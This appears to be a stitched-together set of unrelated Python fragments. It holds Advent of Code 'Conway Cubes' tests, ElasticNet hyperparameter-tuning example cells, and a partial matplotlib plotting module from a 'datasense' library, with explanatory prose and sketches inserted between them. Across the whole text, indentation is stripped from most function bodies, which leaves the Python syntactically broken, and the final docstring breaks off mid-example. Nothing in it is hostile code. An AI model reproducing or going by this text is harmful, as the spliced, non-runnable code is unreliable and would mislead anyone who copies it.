    cube = Cube4D()
    cube.loadFromFile("testinput.txt")
    assert 5 == cube.count()


def test_4():
    from util import Cube4D
    cube = Cube4D()
    cube.loadFromFile("testinput.txt")
    for i in range(0, 6):
        cube = cube.next()
    assert 848 == cube.count()
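These tests target the Advent of Code 2020 day 17 "Conway Cubes" puzzle. A minimal sketch, independent of the `util` module under test, of one 3-D generation step over a set of active `(x, y, z)` coordinates:

```python
from itertools import product
from collections import Counter

def step(active):
    """One Conway-cubes generation: a cell is active next round if it has
    exactly 3 active neighbours, or is active now with exactly 2."""
    counts = Counter(
        (x + dx, y + dy, z + dz)
        for x, y, z in active
        for dx, dy, dz in product((-1, 0, 1), repeat=3)
        if (dx, dy, dz) != (0, 0, 0)
    )
    return {cell for cell, n in counts.items()
            if n == 3 or (n == 2 and cell in active)}

# The puzzle's example grid (.#. / ..# / ###) at z == 0: 5 active cells,
# matching the initial count asserted in test_1 above.
active = {(1, 0, 0), (2, 1, 0), (0, 2, 0), (1, 2, 0), (2, 2, 0)}
for _ in range(6):
    active = step(active)
print(len(active))  # 112, matching test_2 above
```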
# File: examples/regression_original/example_elasticnet_regression.py (repo: c60evaporator/param_tuning_utility, license: BSD-3-Clause)
# %% ElasticNet, GridSearch, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv('../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate'  # objective variable
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude']  # explanatory variables
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.plot_first_validation_curve()
tuning.grid_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_validation_curve()
tuning.plot_best_learning_curve()
tuning.plot_param_importances()
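Each tuning call above sweeps a parameter grid and keeps the best-scoring combination. The core enumeration behind a grid search can be sketched with the stdlib; `score` here is a toy stand-in for the cross-validated scoring that the tuner would actually use:

```python
from itertools import product

def grid_search(param_grid, score):
    """Evaluate every combination in `param_grid` and return the best one
    together with its score (higher is better)."""
    names = sorted(param_grid)
    best_params, best_score = None, float('-inf')
    for values in product(*(param_grid[n] for n in names)):
        params = dict(zip(names, values))
        s = score(params)
        if s > best_score:
            best_params, best_score = params, s
    return best_params, best_score

# Toy score that peaks at alpha=0.01, l1_ratio=0.5
grid = {'alpha': [0.001, 0.01, 0.1], 'l1_ratio': [0.1, 0.5, 0.9]}
best, _ = grid_search(grid,
                      lambda p: -abs(p['alpha'] - 0.01) - abs(p['l1_ratio'] - 0.5))
print(best)  # {'alpha': 0.01, 'l1_ratio': 0.5}
```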
# %% ElasticNet, RandomSearch, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv('../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate'  # objective variable
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude']  # explanatory variables
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.random_search_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% ElasticNet, BayesianOptimization, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv('../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate'  # objective variable
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude']  # explanatory variables
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.bayes_opt_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% ElasticNet, Optuna, no argument
import parent_import
from muscle_tuning import ElasticNetTuning
import pandas as pd
df_reg = pd.read_csv('../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate'  # objective variable
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude']  # explanatory variables
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning.optuna_tuning()
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% ElasticNet, GridSearch, all arguments
import parent_import
from muscle_tuning import ElasticNetTuning
from sklearn.linear_model import ElasticNet
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold
import pandas as pd
import matplotlib.pyplot as plt
df_reg = pd.read_csv('../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate'  # objective variable
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude']  # explanatory variables
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
validation_curve_params = {'alpha': [0, 0.00001, 0.0001, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10, 100],
'l1_ratio': [0, 0.00001, 0.0001, 0.001, 0.01, 0.03, 0.1, 0.3, 0.5, 0.9, 0.97, 0.99, 1]
}
tuning_params = {'alpha': [0.0001, 0.0002, 0.0005, 0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1],
'l1_ratio': [0, 0.00001, 0.00003, 0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 0.9, 0.97, 1]
}
er = Pipeline([('scaler', StandardScaler()), ('enet', ElasticNet())])
not_opt_params = {}
param_scales = {'alpha': 'log',
'l1_ratio': 'linear'
}
fig, axes = plt.subplots(1, 2, figsize=(8, 3))
tuning.plot_first_validation_curve(estimator=er, validation_curve_params=validation_curve_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42, scoring='neg_mean_squared_error',
not_opt_params=not_opt_params, param_scales=param_scales,
plot_stats='median', axes=axes
)
tuning.grid_search_tuning(estimator=er, tuning_params=tuning_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
scoring='neg_mean_squared_error',
not_opt_params=not_opt_params, param_scales=param_scales,
mlflow_logging=None, grid_kws={'n_jobs': 3}
)
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['alpha', 'l1_ratio'],
rounddigits_title=4, rank_number=2, rounddigits_score=4,
subplot_kws={'figsize':(6, 5)}, heat_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='mean', ax=ax)
fig, axes = plt.subplots(1, 2, figsize=(15, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
plot_stats='mean', axes=axes)
tuning.plot_param_importances()
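The hand-written `alpha` grid above is roughly log-spaced and `l1_ratio` is denser near its ends; an equivalent machine-generated grid can be built with numpy (a sketch — the exact values above were presumably hand-picked, so these are close but not identical):

```python
import numpy as np

# Log-spaced alpha grid: 13 points from 1e-4 to 1 (1/3-decade steps).
alpha_grid = np.logspace(-4, 0, num=13)
# Evenly spaced l1_ratio grid from 0 to 1.
l1_grid = np.linspace(0.0, 1.0, num=11)
```

Generated grids like these are easier to widen or refine than hand-typed lists when the search map suggests the optimum sits at a grid edge.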
# %% ElasticNet, Optuna, all arguments
import parent_import
from muscle_tuning import ElasticNetTuning
from sklearn.linear_model import ElasticNet
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold
import pandas as pd
import matplotlib.pyplot as plt
import optuna
df_reg = pd.read_csv(f'../sample_data/osaka_metropolis_english.csv')
OBJECTIVE_VARIABLE = 'approval_rate' # 目的変数
USE_EXPLATATORY = ['2_between_30to60', '3_male_ratio', '5_household_member', 'latitude'] # 説明変数
y = df_reg[OBJECTIVE_VARIABLE].values
X = df_reg[USE_EXPLATATORY].values
tuning = ElasticNetTuning(X, y, USE_EXPLATATORY, y_colname=OBJECTIVE_VARIABLE)
tuning_params = {'alpha':(0.0001, 1),
'l1_ratio': (0, 1)
}
er = Pipeline([('scaler', StandardScaler()), ('enet', ElasticNet())])
not_opt_params = {}
param_scales = {'alpha': 'log',
'l1_ratio': 'linear'
}
validation_curve_params = {'alpha': [0, 0.00001, 0.0001, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10, 100],
'l1_ratio': [0, 0.00001, 0.0001, 0.001, 0.01, 0.03, 0.1, 0.3, 0.5, 0.9, 0.97, 0.99, 1]
}
tuning.optuna_tuning(estimator=er, tuning_params=tuning_params,
cv=KFold(n_splits=3, shuffle=True, random_state=42), seed=42,
scoring='neg_mean_squared_error', n_trials=40,
study_kws={'sampler': optuna.samplers.TPESampler(seed=42)},
optimize_kws={'show_progress_bar': True},
not_opt_params=not_opt_params, int_params=[], param_scales=param_scales,
mlflow_logging=None
)
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_search_history(ax=ax, x_axis='time', plot_kws={'color': 'green'})
plt.show()
tuning.plot_search_map(order=['alpha', 'l1_ratio'],
rounddigits_title=4, rank_number=2, rounddigits_score=4,
subplot_kws={'figsize':(6, 5)}, scatter_kws={'cmap': 'YlOrBr'})
fig, ax = plt.subplots(1, 1, figsize=(6, 4))
tuning.plot_best_learning_curve(plot_stats='mean', ax=ax)
fig, axes = plt.subplots(1, 2, figsize=(15, 3))
tuning.plot_best_validation_curve(validation_curve_params=validation_curve_params, param_scales=param_scales,
plot_stats='mean', axes=axes)
tuning.plot_param_importances()
# %%
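As a cross-check of the grid-search cells above, the same `Pipeline(StandardScaler -> ElasticNet)` can be tuned with plain scikit-learn's `GridSearchCV`. This sketch uses synthetic data, since neither the sample CSV nor the `muscle_tuning` wrapper is assumed available here:

```python
import numpy as np
from sklearn.linear_model import ElasticNet
from sklearn.model_selection import GridSearchCV, KFold
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler

# Synthetic regression data standing in for the Osaka dataset.
rng = np.random.default_rng(42)
X = rng.normal(size=(60, 4))
y = X @ np.array([1.5, -2.0, 0.0, 0.5]) + rng.normal(scale=0.1, size=60)

pipe = Pipeline([('scaler', StandardScaler()), ('enet', ElasticNet())])
# Pipeline parameters are addressed as '<step name>__<parameter>'.
param_grid = {'enet__alpha': [0.001, 0.01, 0.1, 1.0],
              'enet__l1_ratio': [0.1, 0.5, 0.9]}
gs = GridSearchCV(pipe, param_grid,
                  scoring='neg_mean_squared_error',
                  cv=KFold(n_splits=3, shuffle=True, random_state=42))
gs.fit(X, y)
print(gs.best_params_)
```

The `ElasticNetTuning` calls above wrap essentially this search while adding the history, map, and importance plots.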
'''
Graphical analysis
Colours used are colour-blind friendly.
blue '#0077bb'
cyan '#33bbee'
teal '#009988'
orange '#ee7733'
red '#cc3311'
magenta '#ee3377'
grey '#bbbbbb'
'''
from typing import List, Optional, Tuple, Union
import math
from matplotlib.ticker import FormatStrFormatter
from datasense import natural_cubic_spline
from scipy.stats import norm, probplot
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import matplotlib.axes as axes
import pandas as pd
import numpy as np
def plot_scatter_y(
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y. Optional smoothing applied to y.
The abscissa is a series of integers 1 to the size of y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
Parameters
----------
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_y = ds.random_data()
>>> fig, ax = ds.plot_scatter_y(y=series_y)
>>> plt.show()
Example 2
>>> fig, ax = ds.plot_scatter_y(
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=4,
>>> colour='#ee7733'
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
X = pd.Series(range(1, y.size + 1, 1))
if smoothing is None:
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
elif smoothing == 'natural_cubic_spline':
model = natural_cubic_spline(
X=X,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(X),
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
return (fig, ax)
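The docstring above describes the smoothing as a natural cubic spline: piecewise cubic, linear beyond the boundary knots, and twice continuously differentiable at every knot. A minimal sketch of that construction using the textbook truncated-power natural-spline basis follows; it is an illustration only, and `datasense.natural_cubic_spline` may be implemented differently:

```python
import numpy as np

def natural_spline_basis(x, knots):
    """Truncated-power natural cubic spline basis: 1, x, and K-2 terms."""
    x = np.asarray(x, dtype=float)
    knots = np.sort(np.asarray(knots, dtype=float))
    K = len(knots)

    def d(k):
        # ((x - xi_k)_+^3 - (x - xi_K)_+^3) / (xi_K - xi_k)
        return (np.maximum(x - knots[k], 0.0) ** 3
                - np.maximum(x - knots[-1], 0.0) ** 3) / (knots[-1] - knots[k])

    cols = [np.ones_like(x), x]
    for k in range(K - 2):
        cols.append(d(k) - d(K - 2))
    return np.column_stack(cols)

# Least-squares fit on the spline basis.
x = np.linspace(0.0, 10.0, 50)
y = 2.0 * x + 1.0
B = natural_spline_basis(x, knots=np.linspace(0.0, 10.0, 5))
coef, *_ = np.linalg.lstsq(B, y, rcond=None)
y_hat = B @ coef
```

Because the basis contains the constant and linear terms, a least-squares fit reproduces a straight line essentially exactly, consistent with the "linear outside the knots" behaviour described above.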
def plot_scatter_x_y(
X: pd.Series,
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y versus X. Optional smoothing applied to y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
    Parameters
    ----------
    X : pd.Series
The data to plot on the abscissa.
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
    >>> series_x = ds.datetime_data()
>>> series_y = ds.random_data()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
Example 2
>>> series_x = ds.random_data(distribution='randint').sort_values()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=8,
>>> colour='#cc3311'
>>> )
>>> plt.show()
Example 3
>>> series_x = ds.random_data(distribution='uniform').sort_values()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
Example 4
>>> series_x = ds.random_data().sort_values()
>>> fig, ax = ds.plot_scatter_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model = natural_cubic_spline(
X=XX,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(XX),
marker=marker,
markersize=markersize,
linestyle='None',
color=colour
)
return (fig, ax)
def plot_line_y(
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
linestyle: Optional[str] = '-',
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Line plot of y. Optional smoothing applied to y.
The abscissa is a series of integers 1 to the size of y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
Parameters
----------
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_y = ds.random_data()
>>> fig, ax = ds.plot_line_y(y=series_y)
>>> plt.show()
Example 2
>>> fig, ax = ds.plot_line_y(
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=4,
>>> colour='#ee7733'
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
X = pd.Series(range(1, y.size + 1, 1))
if smoothing is None:
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle=linestyle,
color=colour
)
elif smoothing == 'natural_cubic_spline':
model = natural_cubic_spline(
X=X,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(X),
marker=marker,
markersize=markersize,
linestyle=linestyle,
color=colour
)
return (fig, ax)
def plot_line_x_y(
X: pd.Series,
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
linestyle: Optional[str] = '-',
colour: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y versus X. Optional smoothing applied to y.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
Parameters
----------
    X : pd.Series
The data to plot on the abscissa.
y : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
linestyle : Optional[str] = '-'
The style of the line joining the points.
colour : Optional[str] = '#0077bb'
The colour of the plot point (hexadecimal triplet string).
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
    >>> series_x = ds.datetime_data()
    >>> series_y = ds.random_data()
    >>> fig, ax = ds.plot_line_x_y(
    >>>     X=series_x,
    >>>     y=series_y
    >>> )
>>> plt.show()
Example 2
>>> series_x = ds.random_data(distribution='randint').sort_values()
>>> fig, ax = ds.plot_line_x_y(
>>> X=series_x,
>>> y=series_y,
>>> figsize=(8, 4.5),
>>> marker='o',
>>> markersize=8,
>>> linestyle=':',
>>> colour='#337733'
>>> )
>>> plt.show()
Example 3
>>> series_x = ds.random_data(distribution='uniform').sort_values()
>>> fig, ax = ds.plot_line_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
Example 4
>>> series_x = ds.random_data().sort_values()
>>> fig, ax = ds.plot_line_x_y(
>>> X=series_x,
>>> y=series_y
>>> )
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y,
marker=marker,
markersize=markersize,
linestyle=linestyle,
            color=colour
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
# TODO: is this necessary?
fig.autofmt_xdate()
else:
XX = X
model = natural_cubic_spline(
X=XX,
y=y,
number_knots=number_knots
)
ax.plot(
X,
model.predict(XX),
marker=marker,
markersize=markersize,
            linestyle=linestyle,
            color=colour
        )
return (fig, ax)
def plot_scatter_scatter_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = 'None',
linestyle2: Optional[str] = 'None',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y1 versus X.
Scatter plot of y2 versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
Parameters
----------
X : pd.Series
The data to plot on the abscissa.
y1 : pd.Series
The data to plot on the ordinate.
y2 : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker1 : Optional[str] = '.'
The type of plot point for y1.
marker2 : Optional[str] = '.'
The type of plot point for y2.
markersize1 : Optional[int] = 8
The size of the plot point for y1.
markersize2 : Optional[int] = 8
The size of the plot point for y2.
linestyle1 : Optional[str] = 'None'
The style of the line for y1.
linestyle2 : Optional[str] = 'None'
The style of the line for y2.
    linewidth1 : Optional[float] = 1
        The width of the line for y1.
    linewidth2 : Optional[float] = 1
        The width of the line for y2.
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
labellegendy1 : Optional[str] = None
The legend label of the line y1.
labellegendy2 : Optional[str] = None
The legend label of the line y2.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_x = ds.datetime_data()
>>> series_y1 = ds.random_data()
>>> series_y2 = ds.random_data()
>>> fig, ax = ds.plot_scatter_scatter_x_y1_y2(
>>> X=series_x,
>>> y1=series_y1,
>>> y2=series_y2
>>> )
>>> plt.show()
Example 2
>>> series_x = ds.random_data(distribution='uniform')
>>> fig, ax = ds.plot_scatter_scatter_x_y1_y2(
>>> X=series_x,
>>> y1=series_y1,
>>> y2=series_y2,
>>> figsize=(8, 5),
>>> marker1='o',
>>> marker2='+',
>>> markersize1=8,
>>> markersize2=12,
>>> colour1='#cc3311',
>>> colour2='#ee3377',
>>> labellegendy1='y1',
>>> labellegendy2='y2'
>>> )
>>> ax.legend(frameon=False)
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
        ax.plot(
            X,
            model1.predict(XX),
            marker=marker1,
            markersize=markersize1,
            linestyle=linestyle1,
            linewidth=linewidth1,
            color=colour1,
            label=labellegendy1
        )
        ax.plot(
            X,
            model2.predict(XX),
            marker=marker2,
            markersize=markersize2,
            linestyle=linestyle2,
            linewidth=linewidth2,
            color=colour2,
            label=labellegendy2
        )
return (fig, ax)
def plot_scatter_scatter_x1_x2_y1_y2(
X1: pd.Series,
X2: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = 'None',
linestyle2: Optional[str] = 'None',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y1 versus X1.
Scatter plot of y2 versus X2.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
    Fit a piecewise cubic function with the constraint that the fitted curve
    is linear outside the range of the knots. The fitted curve is continuously
    differentiable to the second order at all of the knots.
Parameters
----------
X1 : pd.Series
The data to plot on the abscissa.
X2 : pd.Series
The data to plot on the abscissa.
y1 : pd.Series
The data to plot on the ordinate.
y2 : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker1 : Optional[str] = '.'
The type of plot point for y1.
marker2 : Optional[str] = '.'
The type of plot point for y2.
markersize1 : Optional[int] = 8
The size of the plot point for y1.
markersize2 : Optional[int] = 8
The size of the plot point for y2.
linestyle1 : Optional[str] = 'None'
The style of the line for y1.
linestyle2 : Optional[str] = 'None'
The style of the line for y2.
    linewidth1 : Optional[float] = 1
        The width of the line for y1.
    linewidth2 : Optional[float] = 1
        The width of the line for y2.
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
labellegendy1 : Optional[str] = None
The legend label of the line y1.
labellegendy2 : Optional[str] = None
The legend label of the line y2.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_x1 = ds.datetime_data()
>>> series_x2 = ds.datetime_data()
>>> series_y1 = ds.random_data()
>>> series_y2 = ds.random_data()
>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2
>>> )
>>> plt.show()
Example 2
>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2,
>>> smoothing='natural_cubic_spline',
>>> number_knots=7
>>> )
>>> plt.show()
Example 3
>>> series_x1 = ds.random_data(distribution='uniform').sort_values()
>>> series_x2 = ds.random_data(distribution='uniform').sort_values()
>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2,
>>> figsize=(8, 5),
>>> marker1='o',
>>> marker2='+',
>>> markersize1=8,
>>> markersize2=12,
>>> colour1='#cc3311',
>>> colour2='#ee3377',
>>> labellegendy1='y1',
>>> labellegendy2='y2'
>>> )
>>> ax.legend(frameon=False)
>>> plt.show()
Example 4
